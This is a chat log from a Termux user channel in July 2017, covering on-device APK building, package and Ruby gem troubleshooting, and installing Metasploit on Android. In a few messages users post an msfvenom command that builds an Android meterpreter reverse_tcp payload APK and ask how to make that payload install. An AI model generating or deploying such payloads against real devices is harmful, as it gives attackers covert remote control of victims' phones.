2017-07-28 11:44:05 sdrausty Auxilus: Yes we can build APKs on device. https://sdrausty.github.io/buildAPKs/
2017-07-28 11:44:55 gitter (Auxilus) Thanks sdrausty
2017-07-28 11:45:00 gitter (Auxilus) I’ll check it out
2017-07-28 11:45:13 sdrausty https://github.com/termux/termux-boot
2017-07-28 11:45:41 gitter (vishalbiswas) it would be awesome if I could use my (mostly) useless phone to run gitlab and gitlab-ci
2017-07-28 11:46:20 sdrausty Auxilus: Feedback has improved this repository. Feedback about buildAPKs is welcome.
2017-07-28 11:46:53 sdrausty *has greatly improved
2017-07-28 11:47:40 gitter (Techzindia) @Auxilus no nokogiri successful installed
2017-07-28 11:49:06 sdrausty अपनी जेब में लिनक्स = Termux
2017-07-28 11:49:50 gitter (vishalbiswas) sdrausty: what are you using for all these translations
2017-07-28 11:50:15 benl90 I agree to left my laptop behind and use tablet for code. thanks sdrausty .
2017-07-28 11:51:11 benl90 I must take rest. Thanks for the information. God Bless.
2017-07-28 11:53:46 gitter (vishalbiswas) benl90
2017-07-28 11:54:04 gitter (vishalbiswas) you sound like a sage about to undertake hibernation
2017-07-28 11:55:15 gitter (Techzindia) @vishalbiswas now tomorrow i try to install metasploit with @Auxilus script ….4th time installation on my termux
2017-07-28 11:55:20 gitter (Techzindia) Hehehehe
2017-07-28 11:57:10 sdrausty vishalbiswas: translate.google.com And I am reverse translating before posting because sometimes translate.google.com does not translate well.
2017-07-28 11:58:19 gitter (Auxilus) @Techzindia is nokogiri is. Failing on my script ?
2017-07-28 11:58:44 gitter (vishalbiswas) sdrausty: hehe that was 5 years ago
2017-07-28 11:59:34 gitter (Auxilus) sdrausty: I will
2017-07-28 12:01:00 gitter (kuburan) @benl90 tahutek, orang surabaya ya gan ?
2017-07-28 12:01:35 sdrausty For example it translates “Linux in your pocket = Termux” as “लिनक्स में आपकी पॉकेट = टर्मयुक्स”. Which reverse translates to: “Your Pocket = Term Oaks in Linux”. Which can be completely missleading.
2017-07-28 12:02:02 gitter (Auxilus) 😂😂😁
2017-07-28 12:02:06 gitter (vishalbiswas) hahahaha
2017-07-28 12:02:10 gitter (vishalbiswas) fell off my chair
2017-07-28 12:02:14 gitter (Auxilus) Etfff
2017-07-28 12:02:22 gitter (Auxilus) Translation is not even correct
2017-07-28 12:02:24 sdrausty *is (can be)
2017-07-28 12:02:51 gitter (Auxilus) Linux me AAP ki pocket means pocket in inside Linux
2017-07-28 12:02:52 gitter (Auxilus)
2017-07-28 12:02:59 gitter (vishalbiswas) it actually means “your pocket in linux = termyuks”
2017-07-28 12:03:29 gitter (Auxilus) लिनक्स में आपकी पॉकेट = your pocket in Linux = termyuks 😂😂😂
2017-07-28 12:05:10 gitter (Auxilus) sdrausty: can I use your buildAPK to create APK from source files ? Like Termux:widget etc ? :P
2017-07-28 12:05:36 gitter (suryapoo) Hahahahahah
2017-07-28 12:05:41 gitter (suryapoo) Auxi ..script correct hua kya
2017-07-28 12:06:10 gitter (suryapoo) @vishalbiswas ..yea ..there is space in my phone and I’m inside my $HOME
2017-07-28 12:06:13 gitter (Auxilus) Ha hua
2017-07-28 12:06:15 sdrausty vishalbiswas: “अपनी जेब में लिनक्स = Termux” means “Linux in your pocket = Termux”. Correct?
2017-07-28 12:06:21 gitter (Auxilus) Dude try the script now
2017-07-28 12:06:34 gitter (Auxilus) Yes correct
2017-07-28 12:06:46 gitter (vishalbiswas) @suryapoo try again now
2017-07-28 12:06:53 gitter (vishalbiswas) btw, where are you from?
2017-07-28 12:06:57 gitter (Auxilus) say it sdrausty
2017-07-28 12:07:02 gitter (Auxilus) Can I ?
2017-07-28 12:07:14 gitter (Auxilus) Looks like he is from Maharashtra
2017-07-28 12:07:33 sdrausty Auxilus: Yes, you can. https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice
2017-07-28 12:07:42 gitter (Auxilus) Yeee
2017-07-28 12:07:43 gitter (Auxilus) Ty
2017-07-28 12:07:58 gitter (suryapoo) I’m from Mumbai
2017-07-28 12:08:05 gitter (vishalbiswas) where in mumbai?
2017-07-28 12:08:07 gitter (suryapoo) Tuje kaise malum pada?
2017-07-28 12:08:08 gitter (vishalbiswas) me too
2017-07-28 12:08:13 gitter (suryapoo) Borivali
2017-07-28 12:08:14 gitter (suryapoo) U?
2017-07-28 12:08:18 gitter (vishalbiswas) andheri
2017-07-28 12:08:24 gitter (suryapoo) Auxi
2017-07-28 12:08:37 gitter (vishalbiswas) he is a little further
2017-07-28 12:08:48 gitter (Auxilus) Poojary to Maharashtra mein he Hai
2017-07-28 12:09:10 gitter (vishalbiswas) stick to english please
2017-07-28 12:09:20 gitter (suryapoo) @Auxilus ..:D
2017-07-28 12:09:21 sdrausty vishalbiswas: I was born in Europe, and now I live in the USA…
2017-07-28 12:09:32 gitter (suryapoo) @Vishal Biswas..
2017-07-28 12:09:43 sdrausty The melting pot = USA
2017-07-28 12:09:44 gitter (vishalbiswas) sdrausty: you have citizenship of both?
2017-07-28 12:09:46 gitter (suryapoo) Awesome work peeps
2017-07-28 12:09:55 sdrausty NO
2017-07-28 12:09:59 gitter (suryapoo) I’ll install MSF in some time
2017-07-28 12:10:28 gitter (Auxilus) M from Sangli
2017-07-28 12:10:34 gitter (suryapoo) Ohh…
2017-07-28 12:10:40 gitter (Auxilus) But moving to puna for engineering
2017-07-28 12:10:41 gitter (suryapoo) Nice ,auxi
2017-07-28 12:10:55 gitter (Auxilus) On 1st August
2017-07-28 12:11:11 gitter (vishalbiswas) sdrausty: so are you an englishman or an american idiot?
2017-07-28 12:11:34 gitter (suryapoo) Guysm.what are your views on Guis in Python.. I’m thinking of moving back to Python.. I plan to make guis..
2017-07-28 12:12:05 gitter (vishalbiswas) gui and python is a disaster
2017-07-28 12:12:12 sdrausty I have always wanted to visit India and Nepal. I wander whether I will ever do so.
2017-07-28 12:12:22 sdrausty *wonder
2017-07-28 12:13:12 sdrausty I have been to the UK, but only briefly.
2017-07-28 12:13:33 gitter (vishalbiswas) so where actually were you born?
2017-07-28 12:13:52 sdrausty Warsaw
2017-07-28 12:13:59 gitter (vishalbiswas) germanY?
2017-07-28 12:14:11 sdrausty Where were you born Vish?
2017-07-28 12:14:28 gitter (vishalbiswas) shit, poland
2017-07-28 12:14:30 sdrausty Now it is in Poland.
2017-07-28 12:14:33 gitter (suryapoo) @vishalbiswas …Really?? ..oh god..that’s the only language I’m decent at@vishalbiswas
2017-07-28 12:14:53 sdrausty Before that it was in Germany.
2017-07-28 12:15:06 gitter (vishalbiswas) @suryapoo if you are doing lower level canvas stuff, its ok
2017-07-28 12:15:29 gitter (vishalbiswas) but tkinter looks like a frankenstein
2017-07-28 12:15:35 gitter (suryapoo) @vishalbiswas …hahahahah
2017-07-28 12:15:50 gitter (suryapoo) @vishalbiswas …which language do u suggest.. For making guis
2017-07-28 12:15:55 gitter (suryapoo) Pls don’t tell java
2017-07-28 12:15:56 gitter (vishalbiswas) sdrausty: so it was in germany when you were born?
2017-07-28 12:16:05 sdrausty Before that Warsaw was in Russia.
2017-07-28 12:16:27 gitter (vishalbiswas) wow, you can claim to be in so many countries
2017-07-28 12:16:36 gitter (vishalbiswas) without actually moving a leg
2017-07-28 12:16:55 gitter (vishalbiswas) although I don’t think the circumstances of those changes would have been anything but fun
2017-07-28 12:17:58 gitter (vishalbiswas) @suryapoo I’m not a very good person to ask for advice. I don’t create much gui
2017-07-28 12:18:13 gitter (vishalbiswas) but I do android and C# on windows
2017-07-28 12:18:39 gitter (vishalbiswas) trying to learn Qt for cross plat
2017-07-28 12:18:47 sdrausty And before that, it was in the Polish - Lithuanian Commonwealth. Prior to that, Warsaw was in the Kingdom of Poland.
2017-07-28 12:18:58 gitter (suryapoo) @vishalbiswas alright…
2017-07-28 12:20:30 gitter (vishalbiswas) you sure know much about your hometown
2017-07-28 12:22:09 gitter (vishalbiswas) was this change recent? I remember learning Warsaw was in Germany in school
2017-07-28 12:24:07 gitter (sdrausty) It’s a great city with many Polaks
2017-07-28 12:25:35 gitter (sdrausty) *Polacks
2017-07-28 12:25:36 gitter (sdrausty)
2017-07-28 12:25:59 gitter (vishalbiswas) why is your profile pic the earth
2017-07-28 12:27:20 gitter (suryapoo) Guys …is it worth learning C in 2017?
2017-07-28 12:27:37 sdrausty I have stepped foot on 4 (four) continents, so Earth with a view of the USA is appropriate.
2017-07-28 12:28:06 gitter (suryapoo) Like in the age of Python, Js ..C looks like its dying ..
2017-07-28 12:28:52 gitter (vishalbiswas) sdrausty: well the only way I see achieving that feat is by cutting of my feet and parceling it on each of those four continents. #darkhumour
2017-07-28 12:28:59 gitter (vishalbiswas) @suryapoo C will never die
2017-07-28 12:29:12 gitter (vishalbiswas) it is the fastest programming language
2017-07-28 12:30:07 gitter (suryapoo) @vishalbiswas true that..but is it worth learning now?
2017-07-28 12:30:21 gitter (suryapoo) CoZ Python makes u learn faster ..
2017-07-28 12:30:29 gitter (vishalbiswas) that it does
2017-07-28 12:30:38 gitter (vishalbiswas) my first programming language was python
2017-07-28 12:30:42 gitter (suryapoo) You focus on the logic ..not on when to free memory
2017-07-28 12:31:02 gitter (suryapoo) I started with C …I didn’t understand one bit
2017-07-28 12:31:14 gitter (suryapoo) Went to Py..became my fav language..
2017-07-28 12:31:19 gitter (vishalbiswas) but it is an interpreted language so you don’t get low level features
2017-07-28 12:31:30 gitter (suryapoo) Tried ruby..not that enjoyable
2017-07-28 12:31:37 gitter (suryapoo) I feel lost in this jungle
2017-07-28 12:31:51 gitter (suryapoo) I tried all this ..thanks to termux
2017-07-28 12:33:06 gitter (vishalbiswas) thank fornwall, if you do quick grep count on termux-packages repo, you’ll see that more than half of those 605 packages are maintained by him alone
2017-07-28 12:34:57 sdrausty vishalbiswas: Any how would go about downloading and linking libraries? Where is the information about which libraries are needed, and how would you go about downloading them manually.
2017-07-28 12:36:37 gitter (vishalbiswas) sdrausty: https://mvnrepository.com/artifact/com.google.android/android/4.1.1.4
2017-07-28 12:36:50 gitter (vishalbiswas) see those tabs below “Used by”?
2017-07-28 12:37:27 gitter (vishalbiswas) we can either port one of them to termux or emulate their working
2017-07-28 12:37:32 gitter (suryapoo) @vishalbiswas …yea thanks @fornwall
2017-07-28 12:38:31 gitter (vishalbiswas) @suryapoo I always wanted to learn nodejs, it’s getting popular really fast and looks quite powerful
2017-07-28 12:38:33 sdrausty thx -rw-rw—- 1 root everybody 12947757 Jul 28 12:37 android-4.1.1.4.jar
2017-07-28 12:38:45 sdrausty How to link it?
2017-07-28 12:39:31 gitter (suryapoo) @vishalbiswas …its JS on the server side
2017-07-28 12:39:42 gitter (suryapoo) JS is eating the world
2017-07-28 12:40:00 sdrausty Which aapt and ecj optoins?
2017-07-28 12:40:28 gitter (vishalbiswas) sdrausty: I don’t know the specifics just search for “linking java library”
2017-07-28 12:40:48 sdrausty OK
2017-07-28 12:41:19 gitter (vishalbiswas) @suryapoo I will take up kotlin, rust or nodejs next
2017-07-28 12:42:24 gitter (suryapoo) @vishalbiswas ..im stucking with nodejs
2017-07-28 12:42:52 gitter (suryapoo) Sticking*
2017-07-28 12:42:54 gitter (themastersunil) @vishalbiswas Done “apt install -f” but I’m not able to install to install python. because after 96% stopped….
2017-07-28 12:43:31 gitter (themastersunil) please fix this issue….
2017-07-28 12:43:39 gitter (vishalbiswas) @themastersunil there is some problem with postinstall script
2017-07-28 12:44:42 gitter (themastersunil) so what am i do???
2017-07-28 12:45:58 gitter (Ashish882) Hi
2017-07-28 12:46:33 sdrausty vishalbiswas: Where is information about necessary libraries stored in the APK source.
2017-07-28 12:46:45 gitter (Ashish882) @vishalbiswas can you tell me how I forward port in android
2017-07-28 12:46:50 gitter (vishalbiswas) sdrausty: build.gradle
2017-07-28 12:47:02 gitter (vishalbiswas) @themastersunil try removing ../usr/var/lib/dpkg/info/python.postinst
2017-07-28 12:47:03 sdrausty THANK YOU
2017-07-28 12:47:32 gitter (themastersunil) okk, I’ll try..
2017-07-28 12:48:05 gitter (vishalbiswas) then apt install -f
or dpkg-reconfigure python
2017-07-28 12:49:31 sdrausty Ashish882: Hello
2017-07-28 12:50:07 gitter (themastersunil) $ apt install -f
2017-07-28 12:50:08 gitter (themastersunil) E: Could not get lock /data/data/com.termux/files/usr/var/lib/dpkg/lock - open (11: Try again)
2017-07-28 12:50:08 gitter (themastersunil) E: Unable to lock the administration directory (/data/data/com.termux/files/usr/var/lib/dpkg/), is another process using it?
2017-07-28 12:50:41 gitter (Techzindia) @Auxilus Bro in your sh screen its say segmentation fault while run ./msfconsole
2017-07-28 12:51:02 gitter (vishalbiswas) dpkg or apt is already running or you force killed it
2017-07-28 12:51:04 gitter (Techzindia) I fresh Install Termux And use script
2017-07-28 12:51:22 gitter (Techzindia) @vishalbiswas any idea?….
2017-07-28 12:51:38 gitter (vishalbiswas) @themastersunil remove the lock file /data/data/com.termux/files/usr/var/lib/dpkg/lock
2017-07-28 12:51:50 gitter (themastersunil) ok
2017-07-28 12:52:02 sdrausty thermastersuni: search dpkg lock file
if another process is not using it.
2017-07-28 12:52:38 gitter (themastersunil) I’ve removed lock file..
2017-07-28 12:52:45 sdrausty And?
2017-07-28 12:53:10 gitter (vishalbiswas) @Techzindia did you do it after he updated the script?
2017-07-28 12:53:16 gitter (vishalbiswas) there was a typo in his script
2017-07-28 12:54:22 gitter (Techzindia) No but I Install network_interface Manully
2017-07-28 12:55:33 gitter (Techzindia) Now What Next!!! :worried:
2017-07-28 12:56:32 gitter (Hax4us) Why my payload apk size is just 0 kb
2017-07-28 12:56:33 gitter (vishalbiswas) @suryapoo the only problem is var myWebSkills = ;( NOT FOUND );
2017-07-28 12:56:36 gitter (Hax4us) @vishalbiswas
2017-07-28 12:57:34 gitter (vishalbiswas) @Hax4us is it exactly 0kb or 0.18kb or something
2017-07-28 12:58:07 gitter (Techzindia) @Hax4us
2017-07-28 12:58:19 gitter (themastersunil) @vishalbiswas python is installed, but when i execute python command, my phone - switched off
2017-07-28 12:58:38 gitter (Techzindia) ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR IP LPORT=4444 R > /sdcard/name.apk
2017-07-28 12:59:43 gitter (vishalbiswas) @themastersunil this is major. can you provide strace output strace -y -f -o trace.txt python
2017-07-28 13:00:04 gitter (vishalbiswas) @Techzindia run bundle install
2017-07-28 13:00:52 gitter (Hax4us) @vishalbiswas srry I see again and payload size was around 8kb but when I m trying to install …..gives parse error
2017-07-28 13:01:05 gitter (kuburan) @Auxilus i try your script with fresh termux installation, you forgot added ncurses-utils, in my case i still need install ncurses-utils package., please fix your script,,,,,,. ./msfconsole: No such file or directory - infocmp
2017-07-28 13:01:05 gitter (kuburan) /data/data/com.termux/files/usr/lib/ruby/gems/2.4.0/gems/rb-readline-0.5.4/lib/rbreadline.rb:1815:in get_term_capabilities': undefined method
split’ for nil:NilClass (NoMethodError)
2017-07-28 13:01:05 gitter (kuburan) from /data/data/com.termux/files/usr/lib/ruby/gems/2.4.0/gems/rb-readline-0.5.4/lib/rbreadline.rb:2027:in `_rl_init_terminal_io’
2017-07-28 13:01:05 gitter (kuburan) [full message: https://gitter.im/termux/termux?at=597b6dd14bcd78af56f3fab5]
2017-07-28 13:03:01 gitter (themastersunil) strace -y -f -o trace.txt python
2017-07-28 13:03:01 gitter (themastersunil) The program ‘strace’ is not installed. Install it by executing:
2017-07-28 13:03:01 gitter (themastersunil) pkg install strace
2017-07-28 13:03:01 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=597b6e464bcd78af56f3fc0f]
2017-07-28 13:03:11 gitter (themastersunil) nothing….
2017-07-28 13:04:24 gitter (Hax4us) @kuburan here is updated and self tested script curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
2017-07-28 13:04:33 gitter (vishalbiswas) @themastersunil it will save output in trace.txt
2017-07-28 13:05:29 gitter (Hax4us) @vishalbiswas tell…bro…whats the Sol for parse error…I think…I will have to sign my app..??
2017-07-28 13:05:51 gitter (themastersunil) so, again I’m run python my phone hang or lang….
2017-07-28 13:06:11 gitter (vishalbiswas) @Hax4us no, can you try again?
2017-07-28 13:06:39 gitter (vishalbiswas) @Hax4us i don’t actually use metasploit myself, so don’t know about all vars
2017-07-28 13:07:20 gitter (Hax4us) Yes I tried …kk…now I m trying to sign apk..according to Google baba😁
2017-07-28 13:07:37 gitter (vishalbiswas) @themastersunil well, I’m unable to reproduce this on my phone
2017-07-28 13:07:53 gitter (vishalbiswas) so your output would help
2017-07-28 13:09:11 gitter (themastersunil) $python
2017-07-28 13:09:11 gitter (themastersunil) python is runing….
2017-07-28 13:09:15 gitter (themastersunil) thank you
2017-07-28 13:09:33 gitter (vishalbiswas) @themastersunil alternatively you can uninstall and then reinstall it
2017-07-28 13:09:43 gitter (themastersunil) ok
2017-07-28 13:09:57 gitter (vishalbiswas) thanks for what? that error just solved itself
2017-07-28 13:13:52 gitter (kuburan) Yes, @Hax4us i see that ncurses-utils inside your script. it will be fix it.
2017-07-28 13:16:45 gitter (Techzindia) @vishalbiswas again segmentation fault error
2017-07-28 13:17:57 gitter (vishalbiswas) @Techzindia weird, try @Hax4us’s script
2017-07-28 13:19:01 gitter (Techzindia) Ok :(
2017-07-28 13:19:25 gitter (Hax4us) Yes viral bro…try
2017-07-28 13:20:30 gitter (vishalbiswas) @Techzindia it’s probably occurring because you have some corrupted gem installed
2017-07-28 13:20:38 gitter (vishalbiswas) before running that script
2017-07-28 13:20:58 gitter (vishalbiswas) uninstall ruby and remove $PREFIX/lib/ruby
2017-07-28 13:21:09 gitter (Techzindia) Okay
2017-07-28 13:24:38 gitter (Techzindia) @Hax4us ya i try again…3rd time in today
2017-07-28 13:26:34 gitter (kuburan) And @Techzindia also don’t forget to delete the hiden folder .gems and .bundler in home directory
2017-07-28 13:42:33 gitter (Techzindia) Ya
2017-07-28 13:42:36 gitter (Techzindia) Sure
2017-07-28 14:42:36 frumpylava @auxilus The keyboard is swiftkey.
2017-07-28 14:43:06 frumpylava I’m pretty sure i actually made this screenshot.
2017-07-28 16:40:12 gitter (trick765) msfvenom -p android/meterpreter/reverse_tcp LHOST= myip LPORT=4444 R > any.apk
2017-07-28 16:41:18 gitter (trick765) apk is error not install Hax4us what i do
2017-07-28 20:27:15 gitter (fornwall) anyone using mpd, mpc and/or ncmpcpp and want to help out testing https://github.com/termux/termux-packages/pull/1175?
2017-07-28 20:46:50 live_the_dreams seems to work so far
2017-07-28 21:04:07 live_the_dreams i got cargo working in arm vish
2017-07-28 21:04:51 live_the_dreams it is libgit2
2017-07-28 21:04:52 live_the_dreams the funny thing is compiling libgit2 with -d makes cargo work…
2017-07-28 21:05:09 live_the_dreams @vishalbiswas …
2017-07-28 22:10:49 gitter (suryapoo) Peeps…good morning.. Someone is building apks from termux ???
2017-07-28 22:11:58 live_the_dreams » sdrausty if i remember correctly
2017-07-28 22:26:08 gitter (vishalbiswas) live_the_dreams: -d as in TERMUX_DEBUG?
2017-07-28 22:26:25 live_the_dreams yes
2017-07-28 22:27:12 live_the_dreams was going to debug it… and it worked first go
2017-07-28 22:27:12 live_the_dreams makes it hard to debug
2017-07-28 22:59:44 live_the_dreams -DCMAKE_BUILD_TYPE=Debug is what makes it work
2017-07-28 23:30:04 gitter (Auxilus) @kuburan thanks, ill add it
2017-07-28 23:34:05 gitter (Auxilus) @kuburan I’ve added it
2017-07-28 23:59:20 gitter (Auxilus) @vishalbiswas I’ve added ncursrs and ncurses-utils to Prequisities in wiki
2017-07-29 00:37:00 gitter (Techzindia) @Auxilus why i getting error while run ./msfconsole after all installation complete
2017-07-29 00:40:44 gitter (vishalbiswas) @Techzindia did you try removing $PREFIX/lib/ruby and starting from scratch?
2017-07-29 00:47:10 gitter (Auxilus) @Techzindia your old installation of metasploit could be conflicting
2017-07-29 00:47:33 gitter (Auxilus) Eg, previously installed gems etc
2017-07-29 00:48:33 gitter (Auxilus) @vishalbiswas my script is perfect ri8 ?
2017-07-29 01:08:12 gitter (Auxilus) sdrausty:I can’t find steps to build APK from source
2017-07-29 01:19:30 gitter (Techzindia) NOW network_interface error. .
2017-07-29 01:19:33 gitter (Techzindia) current directory: /data/data/com.termux/files/usr/lib/ruby/gems/2.4.0/gems/network_interface-0.0.1/ext/network_interface_ext
2017-07-29 01:19:33 gitter (Techzindia) make “DESTDIR=”
2017-07-29 01:19:33 gitter (Techzindia) compiling netifaces.c
2017-07-29 01:19:33 gitter (Techzindia) [full message: https://gitter.im/termux/termux?at=597c1ae6c101bc4e3acdb192]
2017-07-29 01:20:14 gitter (Techzindia) @vishalbiswas yes
2017-07-29 01:20:34 gitter (suryapoo) weird: when i write a server in node..it shows 504 status in browser…but when i use curl ..it works perfectly..your views?
2017-07-29 01:26:53 sdrausty Auxilus: The steps to build the APK from source are:
2017-07-29 01:28:07 sdrausty cd && pkg install aapt apksigner dx ecj git
2017-07-29 01:28:07 sdrausty git clone https://github.com/sdrausty/buildAPKs
2017-07-29 01:28:07 sdrausty ./buildAPKs/buildMyFirstAPK.sh
2017-07-29 01:28:57 sdrausty A little more information at https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice
2017-07-29 01:30:28 sdrausty Don’t forget to apt update && apt upgrade
2017-07-29 01:35:43 gitter (Auxilus) @Techzindia have you patched netifaces.c ?
2017-07-29 01:53:14 gitter (suryapoo) @Auxilus is it working?
2017-07-29 01:54:16 gitter (Auxilus) @suryapoo script is working
2017-07-29 01:54:25 gitter (Auxilus) What errors are you getting ?
2017-07-29 01:56:19 gitter (Techzindia) @Auxilus ya patched
2017-07-29 01:57:00 gitter (Auxilus) Now gem build network_interface.gemspec
2017-07-29 01:57:10 gitter (Auxilus) In network interfere dir
2017-07-29 01:58:59 gitter (Techzindia) sed ‘s | git ls-files | find -type f | ’ -i network_interface.gemspec |
2017-07-29 01:58:59 gitter (Techzindia) $ curl -L https://wiki.termux.com/images/6/6b/Netifaces.patch -o netifaces.patch
2017-07-29 01:58:59 gitter (Techzindia) % Total % Received % Xferd Average Speed Time Time Time Current
2017-07-29 01:58:59 gitter (Techzindia) [full message: https://gitter.im/termux/termux?at=597c242445fc670746d7e16f]
2017-07-29 01:59:39 gitter (Techzindia) …
2017-07-29 01:59:40 gitter (Techzindia) ERROR: Error installing network_interface-0.0.1.gem:
2017-07-29 01:59:40 gitter (Techzindia) ERROR: Failed to build gem native extension.
2017-07-29 01:59:40 gitter (Techzindia) [full message: https://gitter.im/termux/termux?at=597c244cc101bc4e3acdce58]
2017-07-29 02:42:12 gitter (vishalbiswas) there are so many screenshots, can you give the link here
2017-07-29 02:42:38 gitter (vishalbiswas) @Techzindia got it
2017-07-29 02:42:46 gitter (vishalbiswas) what arch are you on?
2017-07-29 02:49:21 gitter (Auxilus) @vishalbiswas looks like error is in netifaces.h
2017-07-29 02:49:21 gitter (Auxilus) Line 75
2017-07-29 02:49:29 gitter (vishalbiswas) @Techzindia retry now updated the patch
2017-07-29 02:49:37 gitter (vishalbiswas) some phones require that too
2017-07-29 02:49:47 gitter (vishalbiswas) please redo network_interface step
2017-07-29 02:52:39 sdrausty vishalbiswas: Your lead https://mvnrepository.com/artifact/com.google.android/android/4.1.1.4 has inspired https://github.com/sdrausty/buildAPKsLibraries Thank You.
2017-07-29 02:54:27 gitter (vishalbiswas) sdrausty: btw that is the android plugin not a library to be linked
2017-07-29 02:54:57 sdrausty Android plugin?
2017-07-29 02:55:17 gitter (vishalbiswas) for ide
2017-07-29 02:55:33 gitter (vishalbiswas) i just gave you that as an example
2017-07-29 02:55:44 gitter (vishalbiswas) but it doesn’t change things don’t worry
2017-07-29 02:55:51 sdrausty You just inspired buildAPKsAtifacts Thank you again. lol
2017-07-29 02:56:22 gitter (vishalbiswas) i mean you shouldn’t have that in your repo
2017-07-29 02:56:36 gitter (vishalbiswas) instead have android support library binaries
2017-07-29 02:57:38 sdrausty https://github.com/sdrausty/buildAPKsLibraries is a submode to be link against source.
2017-07-29 02:58:09 gitter (vishalbiswas) @Auxilus why don’t you fix the shebang in your repo itself?
2017-07-29 03:00:12 gitter (vishalbiswas) I simplified your script instructions in the wik
2017-07-29 03:05:33 sdrausty @vishalbiswas com.android.tools.build:gradle:2.3.3 is in https://github.com/vishalbiswas/Splash/blob/master/build.gradle and must be linked with https://github.com/vishalbiswas/Splash to resolve https://github.com/vishalbiswas/Splash/issues/2 on device, in this case a smartphone. Correct?
2017-07-29 03:06:37 gitter (vishalbiswas) that should only be done if you are using gradle I think
2017-07-29 03:06:54 gitter (vishalbiswas) and this is the top level build.gradle
2017-07-29 03:07:09 gitter (vishalbiswas) dependencies are given in module build.gradle
2017-07-29 03:07:32 gitter (vishalbiswas) this one -> https://github.com/vishalbiswas/Splash/blob/master/app/build.gradle
2017-07-29 03:12:44 sdrausty @vishalbiswas In this particular case your source must be linked with android-2.3.3.jar using ecj, aapt or both? And which option should be used to invoke linking with either ecj or aapt? Do you have any idea?
2017-07-29 03:13:07 sdrausty Not using gradle @vishalbiswas
2017-07-29 03:14:12 sdrausty We have the same link https://github.com/vishalbiswas/Splash/blob/master/build.gradle
2017-07-29 03:14:37 sdrausty translates to android-2.3.3.jar
2017-07-29 03:15:08 gitter (vishalbiswas) no
2017-07-29 03:15:20 gitter (vishalbiswas) i linked to the build.gradle file in app directory
2017-07-29 03:15:29 sdrausty no what?
2017-07-29 03:15:33 gitter (vishalbiswas) each module has another build.gradle
2017-07-29 03:16:00 sdrausty each project has one build.gradle
2017-07-29 03:16:01 gitter (vishalbiswas) the top level build.gradle file specifies that android plugin for gradle, which we don’t use
2017-07-29 03:16:22 gitter (vishalbiswas) click on my link
2017-07-29 03:16:27 sdrausty don’t use?
2017-07-29 03:16:38 gitter (vishalbiswas) we are not using gradle
2017-07-29 03:16:53 sdrausty no we are not using gradle
2017-07-29 03:17:13 sdrausty we just want the parts gradle uses
2017-07-29 03:17:56 gitter (Techzindia) Now … problem Solved ;)
2017-07-29 03:17:56 gitter (vishalbiswas) click the link i posted and look for dependencies { there
2017-07-29 03:18:07 sdrausty I clicked on your link and google lead me to android-2.3.3.jar
2017-07-29 03:18:23 gitter (vishalbiswas) https://github.com/vishalbiswas/Splash/blob/master/app/build.gradle
2017-07-29 03:19:04 gitter (vishalbiswas) ```gradle
2017-07-29 03:19:04 gitter (vishalbiswas) dependencies {
2017-07-29 03:19:04 gitter (vishalbiswas) compile fileTree(include: [‘*.jar’], dir: ‘libs’)
2017-07-29 03:19:04 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=597c36e74bcd78af56f64a11]
2017-07-29 03:19:21 sdrausty Aah, we need a few more of these.
2017-07-29 03:19:29 sdrausty no problem
2017-07-29 03:19:35 gitter (vishalbiswas) first line says to link against all *.jar files in libs/
2017-07-29 03:19:43 sdrausty it will just take some time
2017-07-29 03:19:49 gitter (vishalbiswas) but not all apps use the same library version
2017-07-29 03:19:53 sdrausty that’s all
2017-07-29 03:20:02 gitter (vishalbiswas) and they are not inter-compatible
2017-07-29 03:20:08 gitter (vishalbiswas) thats the biggest hurdle
2017-07-29 03:20:17 gitter (vishalbiswas) dependency resolution
2017-07-29 03:20:25 sdrausty as long as we can extract what’s needed
2017-07-29 03:21:56 gitter (Auxilus) @vishalbiswas I’ll do it right away
2017-07-29 03:22:07 sdrausty in the long run these
2017-07-29 03:22:13 sdrausty dependencies should be directly download from
2017-07-29 03:22:37 gitter (Auxilus) Should I do /bin/sh
or /bin/bash
?
2017-07-29 03:22:44 gitter (Auxilus) Both same things ?
2017-07-29 03:22:44 sdrausty https://mvnrepository.com/
2017-07-29 03:22:59 sdrausty That’s the goal.
2017-07-29 03:24:14 gitter (vishalbiswas) @Auxilus #!/data/data/com.termux/files/usr/bin/bash
2017-07-29 03:24:23 gitter (Auxilus) Done
2017-07-29 03:24:38 sdrausty As I mentioned before, ”wget
and a little elbow grease might be all we need to make these project build on device “
2017-07-29 03:24:56 gitter (Auxilus) What do we have to do to get metasploit run as command?
2017-07-29 03:26:20 sdrausty *projects
2017-07-29 03:27:06 sdrausty Build a metasploit APK?
2017-07-29 03:27:20 gitter (vishalbiswas) @Auxilus either add that directory to PATH or ln -s all required tools
2017-07-29 03:28:07 gitter (Auxilus) Nay , I mean like msfconsole
instead of ./msfconsole
2017-07-29 03:29:24 gitter (vishalbiswas) that’s what i said
2017-07-29 03:38:24 gitter (Auxilus) KK
2017-07-29 03:38:24 gitter (Auxilus)
2017-07-29 03:38:54 gitter (Auxilus) Then each time I open Termux I’ll be in metasploit-framework
?
2017-07-29 03:40:11 gitter (vishalbiswas) who r u talking to?
2017-07-29 03:40:56 sdrausty @vishalbiswas Splash has 1171 build.gradle files.
2017-07-29 03:41:04 gitter (Auxilus) You @vishalbiswas
2017-07-29 03:41:26 gitter (vishalbiswas) sdrausty: how did you get the count?
2017-07-29 03:41:31 gitter (Auxilus) $PATH
is default dir right ?
2017-07-29 03:41:37 gitter (vishalbiswas) @Auxilus no
2017-07-29 03:41:51 sdrausty This is going to take some time…
2017-07-29 03:42:02 gitter (Auxilus) K
2017-07-29 03:42:07 gitter (vishalbiswas) $PATH is the list of directories whose files you can call directly
2017-07-29 03:42:25 gitter (Auxilus) Ah , ok
2017-07-29 03:42:41 sdrausty $ find -name build.gradle » t
2017-07-29 03:42:41 sdrausty $ vi t
2017-07-29 03:42:41 sdrausty $
2017-07-29 03:42:46 gitter (Auxilus) How can I see values currently stored in $PATH ?
2017-07-29 03:42:55 sdrausty The G in vi
2017-07-29 03:43:06 gitter (Auxilus) cat $PATH
?
2017-07-29 03:43:39 gitter (vishalbiswas) @Auxilus echo $PATH
2017-07-29 03:43:46 gitter (Auxilus) K
